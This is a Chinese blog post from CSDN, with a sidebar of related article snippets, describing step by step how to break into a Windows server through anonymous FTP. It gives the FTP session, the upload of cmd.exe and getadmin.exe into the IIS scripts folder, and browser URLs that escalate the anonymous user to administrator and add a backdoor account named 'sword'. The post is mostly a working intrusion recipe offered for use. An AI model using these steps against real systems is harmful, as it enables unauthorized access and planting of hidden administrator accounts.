FTP匿名入侵

最新推荐文章于 2024-06-23 18:30:41 发布
最新推荐文章于 2024-06-23 18:30:41 发布
阅读量1w 收藏 16
点赞数 5
分类专栏: 黑客技术 文章标签: microsoft cgi user service access 浏览器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yeqihong/article/details/1524869
版权

问我怎么进行FTP匿名入侵

我才想起还有这种方式

复习简洁一番,总结了我的FTP匿名入侵经历,和大家分享:

假设一台电脑ip 192.188.0.183(这里用我自己的电脑实验)开放FTP服务

在”运行“里输入”CMD“

输入 ftp 192.188.0.183回车:

Connected to 192.188.0.183.
220 phoenix-r Microsoft FTP Service (Version 5.0).
User (192.188.0.183none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
password输入任何字符+@,是不显示的)
230-你好
230-欢迎来到lzbiz的FTP站点
230 User anonymous logged in.
FTP>

进入了

输入cd /script如果改变目录成功的话就有很大的胜算了

然后将自己的cmd.exe和getadmin.exe(一个提升权限的工具)复制到对方的scripts目录

用命令put就可以了

接着输入:

FTP>bye

221 拜拜,欢迎下次再来

退出了,呵呵,还欢迎我下次再来入侵

不知道大家看到没有,上面的一大段中出现了计算机名的----phoenix-r ,所以匿名用户的名称便是IUSR—

—phoenix-r (这是个常识)

然后在浏览器中输入http://192.188.0.183/scripts/getadmin.exe?iusr_phoenix-r

如果返回CGI Error

就已经成功地将IUSR——phoenix-r 提升为了管理员

然后添加用户:

http://192.188.0.183/scripts/cmd.exe?/c%20c://winnt//system32//net.exe%20sword%20sword%20/add
http://192.188.0.183/scripts/getadmin.exe?sword

这样我就添加了一个叫sword的密码也为sword用户

并提升权限为了管理员

这样就成功地入侵了

以上的前提是一些粗心的管理员没有禁止guest用户,而且匿名权限为”写入“

这样我才可以成功入侵,还有就是匿名帐号是anonymous    

yeqihong
关注
  • 5
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FTP端口扫描入侵工具
09-05
很好用的一款国外扫描网站后台的软件,扫FTP弱口令工具通过绿色认证
ftpserver ftpserver ftpserver ftpserver
05-06
4. 防火墙和入侵检测:配置防火墙规则以阻止未授权访问,启用入侵检测系统以预防恶意攻击。 五、FTP服务器的应用场景 FTP服务器广泛应用于各种场景,如: 1. 开发者共享代码:团队成员可以通过FTP服务器共享项目...
解决方案-漏洞是什么意思-零基础白客笔记
最新发布
程序员三九的博客
06-23 744
来源:https://help.aliyun.com/knowledge_detail/37452.html漏洞描述FTP 弱口令或匿名登录漏洞
简单入侵ftp服务器
Mr.魏
11-17 1623
C语言在QT下编写简单入侵ftp服务器程序 AttackServer.pro #------------------------------------------------- # # Project created by QtCreator 2019-11-16T21:41:42 # #------------------------------------------------- QT ...
一个FTP漏洞服的入侵方案
weixin_34329187的博客
01-10 302
首先经过xscan的扫描 结果为 漏洞 ftp (21/tcp) The remote FTP server closes 远程服FTP务器终止 the connection when a command is too long or i...
入门渗透:FTP入侵——Fawn
栉风沐雪的博客
01-31 1818
入门渗透:FTP入侵——Fawn,使用的是hackthebox靶机。小技巧:可以通过搜索引擎查找csftpd 3.0.3出现的CVE漏洞等,一般最新的服务漏洞不会曝光,但是如果不是最新版本,可以查找相关的漏洞,使用msf的模块进行渗透。遇到没有进行加密的ftp一般运行于21端口,此处靶机为简单的ftp服务。使用的是hackthebox的Fawn靶机。
windows下FTP匿名登录或弱口令漏洞及服务加固
09-30
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为
爆破ftp视频教程
10-19
6. **匿名访问**:如果不需要,应禁用匿名FTP访问。 7. **防火墙规则**:仅允许特定IP地址或IP段访问FTP服务。 【FTP日志监控】 定期检查FTP服务器的日志文件,可以发现异常登录尝试,及时采取应对措施。配合入侵...
FTP扫描工具
12-21
- 扫描前确保有合法授权,否则可能涉及非法入侵行为。 - 谨慎设定扫描参数,避免对目标服务器造成过大的网络负担。 - 扫描结果应立即采取行动,修复发现的问题。 - 了解并遵守相关的法律法规,包括但不限于网络...
网站入侵工具 SQL注入神器
weixin_30267785的博客
01-25 1773
0x 00 前言     SQLMAP 0x 01 注入原理 不说了 *****************************************结束分割线***************************************** 0x 02 安装SQLMap   1. 安装python     官网https://www.python.or...
28天打造专业红客(七)
weixin_34198797的博客
09-23 106
『第7天』从FTP***到SQL 怎么开头呢?每次我都要想很长时间,这主要是我写作文时留下的毛病,总是在开头时想很久。好,就从什么叫FTP开始说吧。大家都知道FTP,但很多人都讲不好它具体指什么,FTP是指文件传输协议,因特网上常用的文件传输协议,它使用户能够在两个联网计算机间实现文件传输,是因特网上传递文件最主要的方法。在使用FTP进行文件传输时,首先...
vsftpd 基本配置实践 匿名anonymous用户上传文件 和 root 登陆
evanever的专栏
09-12 3264
 昨天开始就一直在弄vsftp, 只需要测试一下板子的dn和up速度.不需要太多的安全性考虑,两个问题.匿名和root用户登录,上传文件,在网上找到的东西感觉都很乱而且试了全都失败..最后终于看到一篇能让人看明白且好使的..转过来放着..vsftpd 基本配置实践 匿名anonymous用户上传文件 和 root 登陆可可火山 20080411http://linux.chinaunix.net/
sqlmap实现匿名攻击
星空下de青铜
07-11 154
使用kali匿名攻击wifi网络
渗透测试
07-24 2483
匿名攻击wifi网络 iwconfig查看网卡信息 ifconfig wlan0(网卡名称) down 停用网卡 macchanger wlan0 -r 随机mac地址 / ifconfig wlan0 hw ether xx:xx:xx:xx:xx:xx 指定mac地址 ifconfig wlan0 up 启用网卡 airmon-ng start wlan0 启用无线接口 airodump-ng wlan0mon(以后的网卡都已wlan0mon命名使用)监控附近网络 airodump-ng -c(通道数
MoneyBox靶机之FTP匿名登录漏洞、隐写术、perl 语言反弹、Vmware 无法分配IP地址的问题
qq_40898302的博客
04-28 327
修改/etc/vim/vimrc.tiny文件,将set compatible改成set nocompatible,然后再添加一行set backspace=2即可。:将ro 以及后面信息改为“rw single init=/bin/bash”,然后按"Ctrl+x"进入系统。第三个flag在/root/.root.txt,用perl弹shell需要用到sudo才能获取root权限。arp扫描 、扫描eth0网卡所在网段的所有存活主机的ip。登录:ftp xxx.xxx.xxx.xxx。
如何关闭匿名FTP
weixin_42389270的博客
07-18 4921
如何关闭匿名FTP
centos----windows的ftp匿名登录输入什么用户名和密码
linux-0.11调试教程
01-03 1452
anonymousftp,密码可以不输入。 [root@admin]# ftp 172.2.6.15 Connected to 172.2.6.15 (172.2.6.15). 220 Microsoft FTP Service Name (172.2.6.15:root): ftp 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote sys
允许匿名登陆ftp服务器危险×××
weixin_33800593的博客
11-08 499
对于缺乏网络安全意识的网络管理员,在配置windows服务器时往往只是让web服务器能工作起来,并且打了一些常见的补丁,就认为这个服务器是很安全的了。其实也不然,当他没有注重ftp匿名登陆的危险时,就可能产生严重漏洞。下面我们将以一个实际的例子看看匿名登陆的危险性! 在shell下,我们可以开始的ftp登陆:(假设主机为192.168.0.1) ftp 192.168....
强化Windows 2003 FTP服务器安全策略:操作指南
此外,还提到了匿名FTP的安全漏洞和检查,因为匿名FTP由于无需身份验证,易被滥用。管理员需要了解这些漏洞,比如目录浏览权限、弱密码问题等,以便采取相应措施予以修复。 这份操作手册旨在帮助网站管理者强化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值